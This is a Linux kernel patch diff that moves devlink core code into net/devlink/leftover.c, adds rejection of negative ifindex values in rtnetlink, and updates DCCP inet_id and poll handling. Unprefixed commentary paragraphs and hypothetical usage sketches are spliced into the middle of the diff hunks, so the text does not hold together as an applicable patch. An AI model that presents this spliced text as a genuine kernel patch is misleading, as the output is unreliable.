+-		err = devlink_trap_policer_register(devlink, policer);
+-		if (err)
+-			goto err_trap_policer_register;
+-	}
+-	return 0;
+-
+-err_trap_policer_register:
+-err_trap_policer_verify:
+-	for (i--; i >= 0; i--)
+-		devlink_trap_policer_unregister(devlink, &policers[i]);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devl_trap_policers_register);
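Sketch of a policer array for the helper above; the values are hypothetical but must satisfy the WARN_ON sanity checks (non-zero id, max >= min for both rate and burst). Registration order matters: policers first, then the groups that reference them, then the traps bound to those groups:

static const struct devlink_trap_policer foo_trap_policers[] = {
	/* id, rate, burst, max_rate, min_rate, max_burst, min_burst */
	DEVLINK_TRAP_POLICER(1, 1000, 128, 10000, 1, 1024, 1),
};

	err = devl_trap_policers_register(devlink, foo_trap_policers,
					  ARRAY_SIZE(foo_trap_policers));
	if (err)
		return err;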
+-
+-/**
+- * devl_trap_policers_unregister - Unregister packet trap policers from devlink.
+- * @devlink: devlink.
+- * @policers: Packet trap policers.
+- * @policers_count: Count of provided packet trap policers.
+- */
+-void
+-devl_trap_policers_unregister(struct devlink *devlink,
+-			      const struct devlink_trap_policer *policers,
+-			      size_t policers_count)
+-{
+-	int i;
+-
+-	devl_assert_locked(devlink);
+-	for (i = policers_count - 1; i >= 0; i--)
+-		devlink_trap_policer_unregister(devlink, &policers[i]);
+-}
+-EXPORT_SYMBOL_GPL(devl_trap_policers_unregister);
+-
+-static void __devlink_compat_running_version(struct devlink *devlink,
+-					     char *buf, size_t len)
+-{
+-	struct devlink_info_req req = {};
+-	const struct nlattr *nlattr;
+-	struct sk_buff *msg;
+-	int rem, err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	req.msg = msg;
+-	err = devlink->ops->info_get(devlink, &req, NULL);
+-	if (err)
+-		goto free_msg;
+-
+-	nla_for_each_attr(nlattr, (void *)msg->data, msg->len, rem) {
+-		const struct nlattr *kv;
+-		int rem_kv;
+-
+-		if (nla_type(nlattr) != DEVLINK_ATTR_INFO_VERSION_RUNNING)
+-			continue;
+-
+-		nla_for_each_nested(kv, nlattr, rem_kv) {
+-			if (nla_type(kv) != DEVLINK_ATTR_INFO_VERSION_VALUE)
+-				continue;
+-
+-			strlcat(buf, nla_data(kv), len);
+-			strlcat(buf, " ", len);
+-		}
+-	}
+-free_msg:
+-	nlmsg_free(msg);
+-}
+-
+-static struct devlink_port *netdev_to_devlink_port(struct net_device *dev)
+-{
+-	if (!dev->netdev_ops->ndo_get_devlink_port)
+-		return NULL;
+-
+-	return dev->netdev_ops->ndo_get_devlink_port(dev);
+-}
+-
+-void devlink_compat_running_version(struct devlink *devlink,
+-				    char *buf, size_t len)
+-{
+-	if (!devlink->ops->info_get)
+-		return;
+-
+-	devl_lock(devlink);
+-	__devlink_compat_running_version(devlink, buf, len);
+-	devl_unlock(devlink);
+-}
+-
+-int devlink_compat_flash_update(struct devlink *devlink, const char *file_name)
+-{
+-	struct devlink_flash_update_params params = {};
+-	int ret;
+-
+-	if (!devlink->ops->flash_update)
+-		return -EOPNOTSUPP;
+-
+-	ret = request_firmware(&params.fw, file_name, devlink->dev);
+-	if (ret)
+-		return ret;
+-
+-	devl_lock(devlink);
+-	devlink_flash_update_begin_notify(devlink);
+-	ret = devlink->ops->flash_update(devlink, &params, NULL);
+-	devlink_flash_update_end_notify(devlink);
+-	devl_unlock(devlink);
+-
+-	release_firmware(params.fw);
+-
+-	return ret;
+-}
+-
+-int devlink_compat_phys_port_name_get(struct net_device *dev,
+-				      char *name, size_t len)
+-{
+-	struct devlink_port *devlink_port;
+-
+-	/* RTNL mutex is held here which ensures that devlink_port
+-	 * instance cannot disappear in the middle. No need to take
+-	 * any devlink lock as only permanent values are accessed.
+-	 */
+-	ASSERT_RTNL();
+-
+-	devlink_port = netdev_to_devlink_port(dev);
+-	if (!devlink_port)
+-		return -EOPNOTSUPP;
+-
+-	return __devlink_port_phys_port_name_get(devlink_port, name, len);
+-}
+-
+-int devlink_compat_switch_id_get(struct net_device *dev,
+-				 struct netdev_phys_item_id *ppid)
+-{
+-	struct devlink_port *devlink_port;
+-
+-	/* Caller must hold RTNL mutex or reference to dev, which ensures that
+-	 * devlink_port instance cannot disappear in the middle. No need to take
+-	 * any devlink lock as only permanent values are accessed.
+-	 */
+-	devlink_port = netdev_to_devlink_port(dev);
+-	if (!devlink_port || !devlink_port->switch_port)
+-		return -EOPNOTSUPP;
+-
+-	memcpy(ppid, &devlink_port->attrs.switch_id, sizeof(*ppid));
+-
+-	return 0;
+-}
+-
+-static void __net_exit devlink_pernet_pre_exit(struct net *net)
+-{
+-	struct devlink *devlink;
+-	u32 actions_performed;
+-	unsigned long index;
+-	int err;
+-
+-	/* In case the network namespace is getting destroyed, reload
+-	 * all devlink instances from this namespace into init_net.
+-	 */
+-	devlinks_xa_for_each_registered_get(net, index, devlink) {
+-		WARN_ON(!(devlink->features & DEVLINK_F_RELOAD));
+-		mutex_lock(&devlink->lock);
+-		err = devlink_reload(devlink, &init_net,
+-				     DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
+-				     DEVLINK_RELOAD_LIMIT_UNSPEC,
+-				     &actions_performed, NULL);
+-		mutex_unlock(&devlink->lock);
+-		if (err && err != -EOPNOTSUPP)
+-			pr_warn("Failed to reload devlink instance into init_net\n");
+-		devlink_put(devlink);
+-	}
+-}
+-
+-static struct pernet_operations devlink_pernet_ops __net_initdata = {
+-	.pre_exit = devlink_pernet_pre_exit,
+-};
+-
+-static int __init devlink_init(void)
+-{
+-	int err;
+-
+-	err = genl_register_family(&devlink_nl_family);
+-	if (err)
+-		goto out;
+-	err = register_pernet_subsys(&devlink_pernet_ops);
+-
+-out:
+-	WARN_ON(err);
+-	return err;
+-}
+-
+-subsys_initcall(devlink_init);
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 2758b3f7c0214..9d4507aa736b7 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -2220,13 +2220,27 @@ out_err:
+ 	return err;
+ }
+ 
+-int rtnl_nla_parse_ifla(struct nlattr **tb, const struct nlattr *head, int len,
+-			struct netlink_ext_ack *exterr)
++int rtnl_nla_parse_ifinfomsg(struct nlattr **tb, const struct nlattr *nla_peer,
++			     struct netlink_ext_ack *exterr)
+ {
+-	return nla_parse_deprecated(tb, IFLA_MAX, head, len, ifla_policy,
++	const struct ifinfomsg *ifmp;
++	const struct nlattr *attrs;
++	size_t len;
++
++	ifmp = nla_data(nla_peer);
++	attrs = nla_data(nla_peer) + sizeof(struct ifinfomsg);
++	len = nla_len(nla_peer) - sizeof(struct ifinfomsg);
++
++	if (ifmp->ifi_index < 0) {
++		NL_SET_ERR_MSG_ATTR(exterr, nla_peer,
++				    "ifindex can't be negative");
++		return -EINVAL;
++	}
++
++	return nla_parse_deprecated(tb, IFLA_MAX, attrs, len, ifla_policy,
+ 				    exterr);
+ }
+-EXPORT_SYMBOL(rtnl_nla_parse_ifla);
++EXPORT_SYMBOL(rtnl_nla_parse_ifinfomsg);
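For reference, roughly how a caller such as veth's newlink path is converted to the new helper (a sketch; the surrounding veth code is paraphrased): the peer attribute now gets its embedded ifinfomsg validated, rejecting negative ifindexes, before the nested IFLA attributes are parsed:

	struct nlattr *peer_tb[IFLA_MAX + 1];
	int err;

	if (data && data[VETH_INFO_PEER]) {
		struct nlattr *nla_peer = data[VETH_INFO_PEER];

		err = rtnl_nla_parse_ifinfomsg(peer_tb, nla_peer, extack);
		if (err < 0)
			return err;
	}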
+ 
+ struct net *rtnl_link_get_net(struct net *src_net, struct nlattr *tb[])
+ {
+@@ -3451,6 +3465,9 @@ replay:
+ 	if (ifm->ifi_index > 0) {
+ 		link_specified = true;
+ 		dev = __dev_get_by_index(net, ifm->ifi_index);
++	} else if (ifm->ifi_index < 0) {
++		NL_SET_ERR_MSG(extack, "ifindex can't be negative");
++		return -EINVAL;
+ 	} else if (tb[IFLA_IFNAME] || tb[IFLA_ALT_IFNAME]) {
+ 		link_specified = true;
+ 		dev = rtnl_dev_get(net, tb);
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index b780827f5e0a5..bfececa9e244e 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -130,7 +130,7 @@ int dccp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 						    inet->inet_daddr,
+ 						    inet->inet_sport,
+ 						    inet->inet_dport);
+-	inet->inet_id = get_random_u16();
++	atomic_set(&inet->inet_id, get_random_u16());
+ 
+ 	err = dccp_connect(sk);
+ 	rt = NULL;
+@@ -430,7 +430,7 @@ struct sock *dccp_v4_request_recv_sock(const struct sock *sk,
+ 	RCU_INIT_POINTER(newinet->inet_opt, rcu_dereference(ireq->ireq_opt));
+ 	newinet->mc_index  = inet_iif(skb);
+ 	newinet->mc_ttl	   = ip_hdr(skb)->ttl;
+-	newinet->inet_id   = get_random_u16();
++	atomic_set(&newinet->inet_id, get_random_u16());
+ 
+ 	if (dst == NULL && (dst = inet_csk_route_child_sock(sk, newsk, req)) == NULL)
+ 		goto put_and_exit;
+diff --git a/net/dccp/proto.c b/net/dccp/proto.c
+index abc02d25edc14..c522c76a9f89f 100644
+--- a/net/dccp/proto.c
++++ b/net/dccp/proto.c
+@@ -312,11 +312,15 @@ EXPORT_SYMBOL_GPL(dccp_disconnect);
+ __poll_t dccp_poll(struct file *file, struct socket *sock,
+ 		       poll_table *wait)
+ {
+-	__poll_t mask;
+ 	struct sock *sk = sock->sk;
++	__poll_t mask;
++	u8 shutdown;
++	int state;
+ 
+ 	sock_poll_wait(file, sock, wait);
+-	if (sk->sk_state == DCCP_LISTEN)
++
++	state = inet_sk_state_load(sk);
++	if (state == DCCP_LISTEN)
+ 		return inet_csk_listen_poll(sk);
+ 
+ 	/* Socket is not locked. We are protected from async events
+@@ -325,20 +329,21 @@ __poll_t dccp_poll(struct file *file, struct socket *sock,
+ 	 */
+ 
+ 	mask = 0;
+-	if (sk->sk_err)
++	if (READ_ONCE(sk->sk_err))
+ 		mask = EPOLLERR;
++	shutdown = READ_ONCE(sk->sk_shutdown);
+ 
+-	if (sk->sk_shutdown == SHUTDOWN_MASK || sk->sk_state == DCCP_CLOSED)
++	if (shutdown == SHUTDOWN_MASK || state == DCCP_CLOSED)
+ 		mask |= EPOLLHUP;
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLIN | EPOLLRDNORM | EPOLLRDHUP;
+ 
+ 	/* Connected? */
+-	if ((1 << sk->sk_state) & ~(DCCPF_REQUESTING | DCCPF_RESPOND)) {
++	if ((1 << state) & ~(DCCPF_REQUESTING | DCCPF_RESPOND)) {
+ 		if (atomic_read(&sk->sk_rmem_alloc) > 0)
+ 			mask |= EPOLLIN | EPOLLRDNORM;
+ 
+-		if (!(sk->sk_shutdown & SEND_SHUTDOWN)) {
++		if (!(shutdown & SEND_SHUTDOWN)) {
+ 			if (sk_stream_is_writeable(sk)) {
+ 				mask |= EPOLLOUT | EPOLLWRNORM;
+ 			} else {  /* send SIGIO later */
+@@ -356,7 +361,6 @@ __poll_t dccp_poll(struct file *file, struct socket *sock,
+ 	}
+ 	return mask;
+ }
+-
+ EXPORT_SYMBOL_GPL(dccp_poll);
+ 
+ int dccp_ioctl(struct sock *sk, int cmd, unsigned long arg)
+diff --git a/net/devlink/Makefile b/net/devlink/Makefile
+new file mode 100644
+index 0000000000000..3a60959f71eea
+--- /dev/null
++++ b/net/devlink/Makefile
+@@ -0,0 +1,3 @@
++# SPDX-License-Identifier: GPL-2.0
++
++obj-y := leftover.o
+diff --git a/net/devlink/leftover.c b/net/devlink/leftover.c
+new file mode 100644
+index 0000000000000..63188d6a50fe9
+--- /dev/null
++++ b/net/devlink/leftover.c
+@@ -0,0 +1,12550 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * net/core/devlink.c - Network physical/parent device Netlink interface
++ *
++ * Heavily inspired by net/wireless/
++ * Copyright (c) 2016 Mellanox Technologies. All rights reserved.
++ * Copyright (c) 2016 Jiri Pirko <jiri@mellanox.com>
++ */
++
++#include <linux/etherdevice.h>
++#include <linux/kernel.h>
++#include <linux/module.h>
++#include <linux/types.h>
++#include <linux/slab.h>
++#include <linux/gfp.h>
++#include <linux/device.h>
++#include <linux/list.h>
++#include <linux/netdevice.h>
++#include <linux/spinlock.h>
++#include <linux/refcount.h>
++#include <linux/workqueue.h>
++#include <linux/u64_stats_sync.h>
++#include <linux/timekeeping.h>
++#include <rdma/ib_verbs.h>
++#include <net/netlink.h>
++#include <net/genetlink.h>
++#include <net/rtnetlink.h>
++#include <net/net_namespace.h>
++#include <net/sock.h>
++#include <net/devlink.h>
++#define CREATE_TRACE_POINTS
++#include <trace/events/devlink.h>
++
++#define DEVLINK_RELOAD_STATS_ARRAY_SIZE \
++	(__DEVLINK_RELOAD_LIMIT_MAX * __DEVLINK_RELOAD_ACTION_MAX)
++
++struct devlink_dev_stats {
++	u32 reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
++	u32 remote_reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
++};
++
++struct devlink {
++	u32 index;
++	struct list_head port_list;
++	struct list_head rate_list;
++	struct list_head sb_list;
++	struct list_head dpipe_table_list;
++	struct list_head resource_list;
++	struct list_head param_list;
++	struct list_head region_list;
++	struct list_head reporter_list;
++	struct mutex reporters_lock; /* protects reporter_list */
++	struct devlink_dpipe_headers *dpipe_headers;
++	struct list_head trap_list;
++	struct list_head trap_group_list;
++	struct list_head trap_policer_list;
++	struct list_head linecard_list;
++	struct mutex linecards_lock; /* protects linecard_list */
++	const struct devlink_ops *ops;
++	u64 features;
++	struct xarray snapshot_ids;
++	struct devlink_dev_stats stats;
++	struct device *dev;
++	possible_net_t _net;
++	/* Serializes access to devlink instance-specific objects such as
++	 * port, sb, dpipe, resource, params, region, traps and more.
++	 */
++	struct mutex lock;
++	struct lock_class_key lock_key;
++	u8 reload_failed:1;
++	refcount_t refcount;
++	struct completion comp;
++	struct rcu_head rcu;
++	char priv[] __aligned(NETDEV_ALIGN);
++};
++
++struct devlink_linecard_ops;
++struct devlink_linecard_type;
++
++struct devlink_linecard {
++	struct list_head list;
++	struct devlink *devlink;
++	unsigned int index;
++	refcount_t refcount;
++	const struct devlink_linecard_ops *ops;
++	void *priv;
++	enum devlink_linecard_state state;
++	struct mutex state_lock; /* Protects state */
++	const char *type;
++	struct devlink_linecard_type *types;
++	unsigned int types_count;
++	struct devlink *nested_devlink;
++};
++
++/**
++ * struct devlink_resource - devlink resource
++ * @name: name of the resource
++ * @id: id, per devlink instance
++ * @size: size of the resource
++ * @size_new: updated size of the resource; a reload is needed for it
++ *            to take effect
++ * @size_valid: set when the total size of the resource, including its
++ *              children, is valid
++ * @parent: parent resource
++ * @size_params: size parameters
++ * @list: parent list
++ * @resource_list: list of child resources
++ * @occ_get: occupancy getter callback
++ * @occ_get_priv: occupancy getter callback priv
++ */
++struct devlink_resource {
++	const char *name;
++	u64 id;
++	u64 size;
++	u64 size_new;
++	bool size_valid;
++	struct devlink_resource *parent;
++	struct devlink_resource_size_params size_params;
++	struct list_head list;
++	struct list_head resource_list;
++	devlink_resource_occ_get_t *occ_get;
++	void *occ_get_priv;
++};
++
++void *devlink_priv(struct devlink *devlink)
++{
++	return &devlink->priv;
++}
++EXPORT_SYMBOL_GPL(devlink_priv);
++
++struct devlink *priv_to_devlink(void *priv)
++{
++	return container_of(priv, struct devlink, priv);
++}
++EXPORT_SYMBOL_GPL(priv_to_devlink);
++
++struct device *devlink_to_dev(const struct devlink *devlink)
++{
++	return devlink->dev;
++}
++EXPORT_SYMBOL_GPL(devlink_to_dev);
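The three accessors above implement the usual container pattern: driver private data lives in the trailing priv[] member of struct devlink. A hedged allocation sketch; the foo names and ops structure are hypothetical, while devlink_alloc() and devlink_priv() are the real API:

	struct devlink *devlink;
	struct foo_priv *foo;

	devlink = devlink_alloc(&foo_devlink_ops, sizeof(*foo), dev);
	if (!devlink)
		return -ENOMEM;
	foo = devlink_priv(devlink);	/* points into devlink->priv */
	foo->devlink = devlink;		/* priv_to_devlink(foo) also works */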
++
++static struct devlink_dpipe_field devlink_dpipe_fields_ethernet[] = {
++	{
++		.name = "destination mac",
++		.id = DEVLINK_DPIPE_FIELD_ETHERNET_DST_MAC,
++		.bitwidth = 48,
++	},
++};
++
++struct devlink_dpipe_header devlink_dpipe_header_ethernet = {
++	.name = "ethernet",
++	.id = DEVLINK_DPIPE_HEADER_ETHERNET,
++	.fields = devlink_dpipe_fields_ethernet,
++	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ethernet),
++	.global = true,
++};
++EXPORT_SYMBOL_GPL(devlink_dpipe_header_ethernet);
++
++static struct devlink_dpipe_field devlink_dpipe_fields_ipv4[] = {
++	{
++		.name = "destination ip",
++		.id = DEVLINK_DPIPE_FIELD_IPV4_DST_IP,
++		.bitwidth = 32,
++	},
++};
++
++struct devlink_dpipe_header devlink_dpipe_header_ipv4 = {
++	.name = "ipv4",
++	.id = DEVLINK_DPIPE_HEADER_IPV4,
++	.fields = devlink_dpipe_fields_ipv4,
++	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ipv4),
++	.global = true,
++};
++EXPORT_SYMBOL_GPL(devlink_dpipe_header_ipv4);
++
++static struct devlink_dpipe_field devlink_dpipe_fields_ipv6[] = {
++	{
++		.name = "destination ip",
++		.id = DEVLINK_DPIPE_FIELD_IPV6_DST_IP,
++		.bitwidth = 128,
++	},
++};
++
++struct devlink_dpipe_header devlink_dpipe_header_ipv6 = {
++	.name = "ipv6",
++	.id = DEVLINK_DPIPE_HEADER_IPV6,
++	.fields = devlink_dpipe_fields_ipv6,
++	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ipv6),
++	.global = true,
++};
++EXPORT_SYMBOL_GPL(devlink_dpipe_header_ipv6);
++
++EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_hwmsg);
++EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_hwerr);
++EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_trap_report);
++
++static const struct nla_policy devlink_function_nl_policy[DEVLINK_PORT_FUNCTION_ATTR_MAX + 1] = {
++	[DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR] = { .type = NLA_BINARY },
++	[DEVLINK_PORT_FN_ATTR_STATE] =
++		NLA_POLICY_RANGE(NLA_U8, DEVLINK_PORT_FN_STATE_INACTIVE,
++				 DEVLINK_PORT_FN_STATE_ACTIVE),
++};
++
++static const struct nla_policy devlink_selftest_nl_policy[DEVLINK_ATTR_SELFTEST_ID_MAX + 1] = {
++	[DEVLINK_ATTR_SELFTEST_ID_FLASH] = { .type = NLA_FLAG },
++};
++
++static DEFINE_XARRAY_FLAGS(devlinks, XA_FLAGS_ALLOC);
++#define DEVLINK_REGISTERED XA_MARK_1
++#define DEVLINK_UNREGISTERING XA_MARK_2
++
++/* devlink instances are open to access from user space after the
++ * devlink_register() call. Such a logical barrier allows us to have certain
++ * expectations related to locking.
++ *
++ * Before *_register() - we are in the initialization stage and no parallel
++ * access to the devlink instance is possible. All drivers perform that phase
++ * by implicitly holding the device_lock.
++ *
++ * After *_register() - users and the driver can access the devlink instance
++ * at the same time.
++ */
++#define ASSERT_DEVLINK_REGISTERED(d)                                           \
++	WARN_ON_ONCE(!xa_get_mark(&devlinks, (d)->index, DEVLINK_REGISTERED))
++#define ASSERT_DEVLINK_NOT_REGISTERED(d)                                       \
++	WARN_ON_ONCE(xa_get_mark(&devlinks, (d)->index, DEVLINK_REGISTERED))
++
++struct net *devlink_net(const struct devlink *devlink)
++{
++	return read_pnet(&devlink->_net);
++}
++EXPORT_SYMBOL_GPL(devlink_net);
++
++static void __devlink_put_rcu(struct rcu_head *head)
++{
++	struct devlink *devlink = container_of(head, struct devlink, rcu);
++
++	complete(&devlink->comp);
++}
++
++void devlink_put(struct devlink *devlink)
++{
++	if (refcount_dec_and_test(&devlink->refcount))
++		/* Make sure an unregister operation that may be awaiting the
++		 * completion is unblocked only after all users are past the
++		 * end of the RCU grace period.
++		 */
++		call_rcu(&devlink->rcu, __devlink_put_rcu);
++}
++
++struct devlink *__must_check devlink_try_get(struct devlink *devlink)
++{
++	if (refcount_inc_not_zero(&devlink->refcount))
++		return devlink;
++	return NULL;
++}
++
++void devl_assert_locked(struct devlink *devlink)
++{
++	lockdep_assert_held(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_assert_locked);
++
++#ifdef CONFIG_LOCKDEP
++/* For use in conjunction with LOCKDEP only e.g. rcu_dereference_protected() */
++bool devl_lock_is_held(struct devlink *devlink)
++{
++	return lockdep_is_held(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_lock_is_held);
++#endif
++
++void devl_lock(struct devlink *devlink)
++{
++	mutex_lock(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_lock);
++
++int devl_trylock(struct devlink *devlink)
++{
++	return mutex_trylock(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_trylock);
++
++void devl_unlock(struct devlink *devlink)
++{
++	mutex_unlock(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_unlock);
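The devl_* lock helpers above underpin the naming split seen throughout this file: devl_-prefixed functions assume the caller holds the instance lock, while the devlink_-prefixed wrappers take it themselves. A driver holding the lock across several setup steps would do, schematically (arrays as in the earlier sketches):

	devl_lock(devlink);
	err = devl_trap_policers_register(devlink, foo_trap_policers,
					  ARRAY_SIZE(foo_trap_policers));
	if (!err)
		err = devl_trap_groups_register(devlink, foo_trap_groups,
						ARRAY_SIZE(foo_trap_groups));
	devl_unlock(devlink);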
++
++static struct devlink *
++devlinks_xa_find_get(struct net *net, unsigned long *indexp, xa_mark_t filter,
++		     void * (*xa_find_fn)(struct xarray *, unsigned long *,
++					  unsigned long, xa_mark_t))
++{
++	struct devlink *devlink;
++
++	rcu_read_lock();
++retry:
++	devlink = xa_find_fn(&devlinks, indexp, ULONG_MAX, DEVLINK_REGISTERED);
++	if (!devlink)
++		goto unlock;
++
++	/* In case devlink_unregister() was already called and "unregistering"
++	 * mark was set, do not allow taking a devlink reference here.
++	 * This prevents a live-lock of the devlink_unregister() wait for
++	 * completion.
++	 */
++	if (xa_get_mark(&devlinks, *indexp, DEVLINK_UNREGISTERING))
++		goto retry;
++
++	/* For a possible retry, xa_find_after() should always be used */
++	xa_find_fn = xa_find_after;
++	if (!devlink_try_get(devlink))
++		goto retry;
++	if (!net_eq(devlink_net(devlink), net)) {
++		devlink_put(devlink);
++		goto retry;
++	}
++unlock:
++	rcu_read_unlock();
++	return devlink;
++}
++
++static struct devlink *devlinks_xa_find_get_first(struct net *net,
++						  unsigned long *indexp,
++						  xa_mark_t filter)
++{
++	return devlinks_xa_find_get(net, indexp, filter, xa_find);
++}
++
++static struct devlink *devlinks_xa_find_get_next(struct net *net,
++						 unsigned long *indexp,
++						 xa_mark_t filter)
++{
++	return devlinks_xa_find_get(net, indexp, filter, xa_find_after);
++}
++
++/* Iterate over devlink pointers for which a reference could be taken.
++ * devlink_put() needs to be called for each iterated devlink pointer
++ * in the loop body in order to release the reference.
++ */
++#define devlinks_xa_for_each_get(net, index, devlink, filter)			\
++	for (index = 0,								\
++	     devlink = devlinks_xa_find_get_first(net, &index, filter);		\
++	     devlink; devlink = devlinks_xa_find_get_next(net, &index, filter))
++
++#define devlinks_xa_for_each_registered_get(net, index, devlink)		\
++	devlinks_xa_for_each_get(net, index, devlink, DEVLINK_REGISTERED)
++
++static struct devlink *devlink_get_from_attrs(struct net *net,
++					      struct nlattr **attrs)
++{
++	struct devlink *devlink;
++	unsigned long index;
++	char *busname;
++	char *devname;
++
++	if (!attrs[DEVLINK_ATTR_BUS_NAME] || !attrs[DEVLINK_ATTR_DEV_NAME])
++		return ERR_PTR(-EINVAL);
++
++	busname = nla_data(attrs[DEVLINK_ATTR_BUS_NAME]);
++	devname = nla_data(attrs[DEVLINK_ATTR_DEV_NAME]);
++
++	devlinks_xa_for_each_registered_get(net, index, devlink) {
++		if (strcmp(devlink->dev->bus->name, busname) == 0 &&
++		    strcmp(dev_name(devlink->dev), devname) == 0)
++			return devlink;
++		devlink_put(devlink);
++	}
++
++	return ERR_PTR(-ENODEV);
++}
++
++#define ASSERT_DEVLINK_PORT_REGISTERED(devlink_port)				\
++	WARN_ON_ONCE(!(devlink_port)->registered)
++#define ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port)			\
++	WARN_ON_ONCE((devlink_port)->registered)
++#define ASSERT_DEVLINK_PORT_INITIALIZED(devlink_port)				\
++	WARN_ON_ONCE(!(devlink_port)->initialized)
++
++static struct devlink_port *devlink_port_get_by_index(struct devlink *devlink,
++						      unsigned int port_index)
++{
++	struct devlink_port *devlink_port;
++
++	list_for_each_entry(devlink_port, &devlink->port_list, list) {
++		if (devlink_port->index == port_index)
++			return devlink_port;
++	}
++	return NULL;
++}
++
++static bool devlink_port_index_exists(struct devlink *devlink,
++				      unsigned int port_index)
++{
++	return devlink_port_get_by_index(devlink, port_index);
++}
++
++static struct devlink_port *devlink_port_get_from_attrs(struct devlink *devlink,
++							struct nlattr **attrs)
++{
++	if (attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		u32 port_index = nla_get_u32(attrs[DEVLINK_ATTR_PORT_INDEX]);
++		struct devlink_port *devlink_port;
++
++		devlink_port = devlink_port_get_by_index(devlink, port_index);
++		if (!devlink_port)
++			return ERR_PTR(-ENODEV);
++		return devlink_port;
++	}
++	return ERR_PTR(-EINVAL);
++}
++
++static struct devlink_port *devlink_port_get_from_info(struct devlink *devlink,
++						       struct genl_info *info)
++{
++	return devlink_port_get_from_attrs(devlink, info->attrs);
++}
++
++static inline bool
++devlink_rate_is_leaf(struct devlink_rate *devlink_rate)
++{
++	return devlink_rate->type == DEVLINK_RATE_TYPE_LEAF;
++}
++
++static inline bool
++devlink_rate_is_node(struct devlink_rate *devlink_rate)
++{
++	return devlink_rate->type == DEVLINK_RATE_TYPE_NODE;
++}
++
++static struct devlink_rate *
++devlink_rate_leaf_get_from_info(struct devlink *devlink, struct genl_info *info)
++{
++	struct devlink_rate *devlink_rate;
++	struct devlink_port *devlink_port;
++
++	devlink_port = devlink_port_get_from_attrs(devlink, info->attrs);
++	if (IS_ERR(devlink_port))
++		return ERR_CAST(devlink_port);
++	devlink_rate = devlink_port->devlink_rate;
++	return devlink_rate ?: ERR_PTR(-ENODEV);
++}
++
++static struct devlink_rate *
++devlink_rate_node_get_by_name(struct devlink *devlink, const char *node_name)
++{
++	struct devlink_rate *devlink_rate;
++
++	list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
++		if (devlink_rate_is_node(devlink_rate) &&
++		    !strcmp(node_name, devlink_rate->name))
++			return devlink_rate;
++	}
++	return ERR_PTR(-ENODEV);
++}
++
++static struct devlink_rate *
++devlink_rate_node_get_from_attrs(struct devlink *devlink, struct nlattr **attrs)
++{
++	const char *rate_node_name;
++	size_t len;
++
++	if (!attrs[DEVLINK_ATTR_RATE_NODE_NAME])
++		return ERR_PTR(-EINVAL);
++	rate_node_name = nla_data(attrs[DEVLINK_ATTR_RATE_NODE_NAME]);
++	len = strlen(rate_node_name);
++	/* Name cannot be empty or a decimal number */
++	if (!len || strspn(rate_node_name, "0123456789") == len)
++		return ERR_PTR(-EINVAL);
++
++	return devlink_rate_node_get_by_name(devlink, rate_node_name);
++}
++
++static struct devlink_rate *
++devlink_rate_node_get_from_info(struct devlink *devlink, struct genl_info *info)
++{
++	return devlink_rate_node_get_from_attrs(devlink, info->attrs);
++}
++
++static struct devlink_rate *
++devlink_rate_get_from_info(struct devlink *devlink, struct genl_info *info)
++{
++	struct nlattr **attrs = info->attrs;
++
++	if (attrs[DEVLINK_ATTR_PORT_INDEX])
++		return devlink_rate_leaf_get_from_info(devlink, info);
++	else if (attrs[DEVLINK_ATTR_RATE_NODE_NAME])
++		return devlink_rate_node_get_from_info(devlink, info);
++	else
++		return ERR_PTR(-EINVAL);
++}
++
++static struct devlink_linecard *
++devlink_linecard_get_by_index(struct devlink *devlink,
++			      unsigned int linecard_index)
++{
++	struct devlink_linecard *devlink_linecard;
++
++	list_for_each_entry(devlink_linecard, &devlink->linecard_list, list) {
++		if (devlink_linecard->index == linecard_index)
++			return devlink_linecard;
++	}
++	return NULL;
++}
++
++static bool devlink_linecard_index_exists(struct devlink *devlink,
++					  unsigned int linecard_index)
++{
++	return devlink_linecard_get_by_index(devlink, linecard_index);
++}
++
++static struct devlink_linecard *
++devlink_linecard_get_from_attrs(struct devlink *devlink, struct nlattr **attrs)
++{
++	if (attrs[DEVLINK_ATTR_LINECARD_INDEX]) {
++		u32 linecard_index = nla_get_u32(attrs[DEVLINK_ATTR_LINECARD_INDEX]);
++		struct devlink_linecard *linecard;
++
++		mutex_lock(&devlink->linecards_lock);
++		linecard = devlink_linecard_get_by_index(devlink, linecard_index);
++		if (linecard)
++			refcount_inc(&linecard->refcount);
++		mutex_unlock(&devlink->linecards_lock);
++		if (!linecard)
++			return ERR_PTR(-ENODEV);
++		return linecard;
++	}
++	return ERR_PTR(-EINVAL);
++}
++
++static struct devlink_linecard *
++devlink_linecard_get_from_info(struct devlink *devlink, struct genl_info *info)
++{
++	return devlink_linecard_get_from_attrs(devlink, info->attrs);
++}
++
++static void devlink_linecard_put(struct devlink_linecard *linecard)
++{
++	if (refcount_dec_and_test(&linecard->refcount)) {
++		mutex_destroy(&linecard->state_lock);
++		kfree(linecard);
++	}
++}
++
